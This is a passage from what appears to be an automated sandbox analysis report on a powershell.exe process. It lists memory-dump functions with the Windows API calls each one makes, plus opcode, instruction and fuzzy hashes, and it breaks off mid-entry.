                                                        • Instruction ID: efdaed4877959eee1daa802e32dcfe21a9214c9a5f672c31d91873fbeddda0b0
                                                        • Opcode Fuzzy Hash: 773fc995765956fce71fb4388aaf3e1de5781ceb7c8c972f7430c314bce0b2c3
                                                        • Instruction Fuzzy Hash: 8FD023213451744743056958B8440F9B7C3DDD205430801B9DA53CF145CF416D459781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F423F4, Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159652543.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction ID: 38ab54cd57a2071c5e501dee1cf3ef63a3a5536fc490bc8bb01f7ae5d1b2582e
                                                        • Opcode Fuzzy Hash: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction Fuzzy Hash: 32D05E79604A818FE7168A1CD1A8BA53FA4AF55B04F4644F9F840CB6B3C769E581D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01F423BC, Relevance: .0, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159652543.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction ID: 154db7143f671cb72c19d07afc92d9bfbb9b4aae0128e97d04b904176b41fc8b
                                                        • Opcode Fuzzy Hash: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction Fuzzy Hash: 00D05E347006818FEB15CA1CD194F697BE4AF40700F0644F8BC008B266C7A5E880C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 2940 Parent PID: 2612 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 01CFACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 05bd58922e1d12b636333d2b5a34eecb5db0e7dc5f8e5f7e86e1e934fc91e78e
                                                        • Instruction ID: d9689203546f3e4f9e3df4bf645110249bed10770b5262b6f3fe98ee97c45498
                                                        • Opcode Fuzzy Hash: 05bd58922e1d12b636333d2b5a34eecb5db0e7dc5f8e5f7e86e1e934fc91e78e
                                                        • Instruction Fuzzy Hash: 322191755097849FEB138F25DC44B92FFB4EF06310F08859AE9898B5A3D271D908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: f6c1b15dd7994a4d257072faa92ca9b311b04bc3da85271c1a2d5be5f5dde438
                                                        • Instruction ID: 64ab028f8a5ad8d9246ca0c0ff892efd1e2c60dd9b89b831bd107dc956f55292
                                                        • Opcode Fuzzy Hash: f6c1b15dd7994a4d257072faa92ca9b311b04bc3da85271c1a2d5be5f5dde438
                                                        • Instruction Fuzzy Hash: 7C118C75500700DFEB618F55D884B66FBE4EF04321F08846AEE498B662D331E914CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: f23e8b140fb3cfe239106ca56baa5154ab865cf629f352f859eeede325fc8680
                                                        • Instruction ID: 14902d494ed73dadbfd99a83d48182c84a148d2efc1b557917eb019f463cae4a
                                                        • Opcode Fuzzy Hash: f23e8b140fb3cfe239106ca56baa5154ab865cf629f352f859eeede325fc8680
                                                        • Instruction Fuzzy Hash: 8F11A371509380DFD7228F15DC45F62FFB4EF06210F09849EED854B553C275A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 8200a65a84bd42bb13365a737489075ba1bfa9896c5221ddabe52298a65e50ed
                                                        • Instruction ID: a2001185889cddaff12004077b568a6eb08c4c52316d393765c85c55aec544a2
                                                        • Opcode Fuzzy Hash: 8200a65a84bd42bb13365a737489075ba1bfa9896c5221ddabe52298a65e50ed
                                                        • Instruction Fuzzy Hash: 4801AD35500740DFEB619F09D885B21FBA0EF04B20F08C19EDE890B612C771E918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 9fa8033d80b2144e7db5f19e24774eac40ab04fcc7f8cc1eb42f4bdb8e472331
                                                        • Instruction ID: cad53f04fb21b0628e300a6b2a7f85b7a1df7973017393c4fec42f46c4307751
                                                        • Opcode Fuzzy Hash: 9fa8033d80b2144e7db5f19e24774eac40ab04fcc7f8cc1eb42f4bdb8e472331
                                                        • Instruction Fuzzy Hash: 5031356650E3C08FE7138B759C65692BFB4AF03210F0E84DBD984CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 70f3d7c8087d24564662c85da16a305f5c2fd783f38fbb471d4ec9a04baed38b
                                                        • Instruction ID: e8bd609c3ec60b49492944cd7594960a1b23233ac6c2f69558b74ed48e4dcfa8
                                                        • Opcode Fuzzy Hash: 70f3d7c8087d24564662c85da16a305f5c2fd783f38fbb471d4ec9a04baed38b
                                                        • Instruction Fuzzy Hash: B2318471505380AFE722CF65CC45F52BFF8EF05210F09849EE9898B292D335A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 3ed810084c263a62ff8f7d6f45cdccd49b2da4a6f68206e78aaaedd712f71455
                                                        • Instruction ID: bc3f62b6bb0bafb2ed95232642b974e47660a136f35dcbba7b2767e1943d0b21
                                                        • Opcode Fuzzy Hash: 3ed810084c263a62ff8f7d6f45cdccd49b2da4a6f68206e78aaaedd712f71455
                                                        • Instruction Fuzzy Hash: 8931CA71509380AFE712DB25DC45B96BFE8DF06314F0844AAE984CF293D775A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: a52510b8edc461cc5841209000d14d07c639d81f781845dcef7e009a07bccee2
                                                        • Instruction ID: 3903a7f5e82931433a1db76832e9f6e9da0a571eee7f8b2fcefcf9eb43e7aa3a
                                                        • Opcode Fuzzy Hash: a52510b8edc461cc5841209000d14d07c639d81f781845dcef7e009a07bccee2
                                                        • Instruction Fuzzy Hash: 49318471509380AFE712CB61DC55F96BFB8EF06210F08859BE985DB192D225A908C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 07699a546f999656dcd73ff1bcb91c5ddf7ea6cfcd3c23d4f7da29c8c8c73221
                                                        • Instruction ID: 5d43a5d2cc0ac08db18f75c181e0cd26f457d6a3648d2da68a66f26d4da53e9c
                                                        • Opcode Fuzzy Hash: 07699a546f999656dcd73ff1bcb91c5ddf7ea6cfcd3c23d4f7da29c8c8c73221
                                                        • Instruction Fuzzy Hash: 8B21B6B2509380AFE712CF24DC45B96BFB8EF06320F0885DBE985DB193D2659945C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 2789615bf598d41069c7308d6c170f4385fe830993c0b1a81d9171697bf8387f
                                                        • Instruction ID: e5244d4b5940b6170d36e5ad6970979479f1f3e0a87ef65127122b6dda8b1872
                                                        • Opcode Fuzzy Hash: 2789615bf598d41069c7308d6c170f4385fe830993c0b1a81d9171697bf8387f
                                                        • Instruction Fuzzy Hash: 5831617550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD8848F1A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: a5edef3c7f6f519a79e613ff703955c6b87c3e462dc1e885550624fbdb4a4b15
                                                        • Instruction ID: 5bb1869c64f44521da5698c2a8793e1d642deb7c0b39a88e5226d4fdfdf0eab2
                                                        • Opcode Fuzzy Hash: a5edef3c7f6f519a79e613ff703955c6b87c3e462dc1e885550624fbdb4a4b15
                                                        • Instruction Fuzzy Hash: 3F21A3B1505380EFE722CF15DC45FA6BFB8EF06220F0884AAE945DB152D764E948CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: 49d6acf242c038e77b4c5b0627b2fa33a77d7976bd2e3efe06185736706a24be
                                                        • Instruction ID: 116411f23f396f26f83082ce4b2fbcefc3437f491b4e1ab12a9e1e6054755d54
                                                        • Opcode Fuzzy Hash: 49d6acf242c038e77b4c5b0627b2fa33a77d7976bd2e3efe06185736706a24be
                                                        • Instruction Fuzzy Hash: 2A21C97150D3C09FD312CB258C55B66BFB4EF47610F1981DFD8848F593D225A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 02740819
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 448b2baca3461cb3b0b08655bdb74df4f7941595c9384c28e30f92d234b224e6
                                                        • Instruction ID: ee13d4d53af9d6576064d91e7404f1ec88836a3b5bad2e80d84f9cafed606e5f
                                                        • Opcode Fuzzy Hash: 448b2baca3461cb3b0b08655bdb74df4f7941595c9384c28e30f92d234b224e6
                                                        • Instruction Fuzzy Hash: 8C21F8B6508780AFE712CB159C41FA3BFA8EF46720F0881DAE9848B193D324A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 3f0120a8ac8659e97450f99068324032b21e0bb002b46554a673d979c545cf43
                                                        • Instruction ID: ec3a25f8c202c3e1289beff75cbea40b1bbf53fd7007d9afaee317ecee241fab
                                                        • Opcode Fuzzy Hash: 3f0120a8ac8659e97450f99068324032b21e0bb002b46554a673d979c545cf43
                                                        • Instruction Fuzzy Hash: A3216D7550E3C0AFD3128B259C55B62BFB4EF47610F1A81CBD8848F693D225A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5bd70cefc61144ea2ca6be32ed1e90468178f93f5df96134a61a42aace83b6ee
                                                        • Instruction ID: 50f84d9f671a27a2d1f68e65ef3c6eb279b21363e5e5e26cc364e315e586043f
                                                        • Opcode Fuzzy Hash: 5bd70cefc61144ea2ca6be32ed1e90468178f93f5df96134a61a42aace83b6ee
                                                        • Instruction Fuzzy Hash: 5D218E71500704EFEB21DF65DC85F66FBE8EF08650F04846EEA899B291D771E904CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 027408E5
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 76e9015423b77c26088a22206cb92df0ef6bb21aa5397198781c4bce232e549e
                                                        • Instruction ID: cc7a470d6597ebc14c731cd4d1cb9ac94297ff671184b755c61f89346980e7cd
                                                        • Opcode Fuzzy Hash: 76e9015423b77c26088a22206cb92df0ef6bb21aa5397198781c4bce232e549e
                                                        • Instruction Fuzzy Hash: C121B271409380AFE722CF60DC45F56BFB8EF06310F09859BE9848B153C235A909CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: fa74aaa7cc15cda807a8d5d9deaa164c2fed41881c3feff0240503e8741d5a3e
                                                        • Instruction ID: 4feae3b2411b08fb5636405a3e9cee6545ffc4974a19ca2b44bf2ac8906b9a6c
                                                        • Opcode Fuzzy Hash: fa74aaa7cc15cda807a8d5d9deaa164c2fed41881c3feff0240503e8741d5a3e
                                                        • Instruction Fuzzy Hash: B9219575509780AFD3138B259C51B62BFB4EF87710F0981DBE8888B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 95bef90f87ac2db9892278fb20d3e0f99e1433d9e63eeaf856296b2ca79b164e
                                                        • Instruction ID: a1a5d45c6fad9a3cc4ba45b0480c625b036af858a1ab78b1285948eb9cd59279
                                                        • Opcode Fuzzy Hash: 95bef90f87ac2db9892278fb20d3e0f99e1433d9e63eeaf856296b2ca79b164e
                                                        • Instruction Fuzzy Hash: 7D218171604240AFF724DF25DC85BA6FBE8EF05654F04846AED48DB282D775E904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 14202dff291df2507fe0dffaa99b5479ff32509b4adb9432324c6cc48abab690
                                                        • Instruction ID: 5b13e5b86f0037e6359195ebb601abeb708eb866a7ed0cd359cf668a5f891d33
                                                        • Opcode Fuzzy Hash: 14202dff291df2507fe0dffaa99b5479ff32509b4adb9432324c6cc48abab690
                                                        • Instruction Fuzzy Hash: 11119072500304EFEB21DF55DC85FA6F7A8EF04360F04856AFA459A141D670E9048BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 72b0ad93dc18b65a889516daef84e4129c580b616c4641eff36d01307e2d1a16
                                                        • Instruction ID: ab0c3074506b3c4df05cae3342110653019daef1d39424f6c33bdbfde946d3f0
                                                        • Opcode Fuzzy Hash: 72b0ad93dc18b65a889516daef84e4129c580b616c4641eff36d01307e2d1a16
                                                        • Instruction Fuzzy Hash: 3E117FB1600300EFEB21DF15DC85FA6BBA8EF04660F14856AEE49CB641D774E9048A61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0274137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 98b7b28b99cb81b5e794730fcad81760573d0cbb20be48b757b8c55537d23914
                                                        • Instruction ID: 9dccb9316d24271203db81b0672c0e31265ce3cd3afb23d3d7d4701d78d3d436
                                                        • Opcode Fuzzy Hash: 98b7b28b99cb81b5e794730fcad81760573d0cbb20be48b757b8c55537d23914
                                                        • Instruction Fuzzy Hash: 382192725043809FDB21CF25DC45B96FFB4EF06220F0884AAED858B562D335A848DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 8c610a68955979df53b35368163f0b2d83acfb83d7730e39a3c82018571ac5cc
                                                        • Instruction ID: 6b1345f7edd1c872d63c07cf3c4530fb99c245c221e6b95bc2b9235f393848b4
                                                        • Opcode Fuzzy Hash: 8c610a68955979df53b35368163f0b2d83acfb83d7730e39a3c82018571ac5cc
                                                        • Instruction Fuzzy Hash: 2D219F7150D3C09FDB12CB25DC55B92BFB4AF13214F0C84EADD888F653D2649808CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: e310c005581565f3866e6501c3868b2b9d062de148119f06598d734e7bbd4153
                                                        • Instruction ID: d846d5f810971d0adb683cb36196ae9f283b3bfc06fee7fb5c9f2fa6eb0b88f4
                                                        • Opcode Fuzzy Hash: e310c005581565f3866e6501c3868b2b9d062de148119f06598d734e7bbd4153
                                                        • Instruction Fuzzy Hash: EF2175716053849FD722CF29DC45B52FFA8EF46210F0884AEED49CB652D265E908CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: 6ca20860e55959d47eb1bd57f2ed7c585fb0542a83454e4f408e283d33f111c3
                                                        • Instruction ID: 9eb82477830727d07f03045e3a438de6cc03fea06f39b785ed04cb2b10ffe669
                                                        • Opcode Fuzzy Hash: 6ca20860e55959d47eb1bd57f2ed7c585fb0542a83454e4f408e283d33f111c3
                                                        • Instruction Fuzzy Hash: 47219F725093C49FEB128B25DC55B92BFB4EF07220F0984EADD858F263D224A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027410D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 50ff56a2a3861fb2a7c45993fa0969b472f59f8e17695f5c55d1fdeee4b83ad0
                                                        • Instruction ID: 1a65d00ffbce14e0f5552f1b2e496df6300bdbd6027840cc7118f67b2d2c3226
                                                        • Opcode Fuzzy Hash: 50ff56a2a3861fb2a7c45993fa0969b472f59f8e17695f5c55d1fdeee4b83ad0
                                                        • Instruction Fuzzy Hash: 0A218B6150E3C09FD7138B259C54A62BFB4AF57620F0980DBD8898F2A3D6296808C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 40fc2e4af4ebca8e692bbee6a9a585f425a7535915ad6128c421779cf46cd94c
                                                        • Instruction ID: ca365a956253b97f253d0404ce1b1e67eada8c54308691c54c822425a67bbc91
                                                        • Opcode Fuzzy Hash: 40fc2e4af4ebca8e692bbee6a9a585f425a7535915ad6128c421779cf46cd94c
                                                        • Instruction Fuzzy Hash: EF11C4B2500300EFEB21DF55DC45BAAFBA8EF44760F14856AEE498B181D770E9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01CFBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: e8398866ef40fc6be6e68ad3b54f2a1952971553597ed2f33236a22f1409a54d
                                                        • Instruction ID: 22ebc8269595b85814afc5fec480ecb40089364348ee8ec52a1fad314539fcbe
                                                        • Opcode Fuzzy Hash: e8398866ef40fc6be6e68ad3b54f2a1952971553597ed2f33236a22f1409a54d
                                                        • Instruction Fuzzy Hash: 93119D72504380AFDB22CF65DC45B52FFF4EF05210F0885AEEA898B662D375E918CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02740886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 027408E5
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
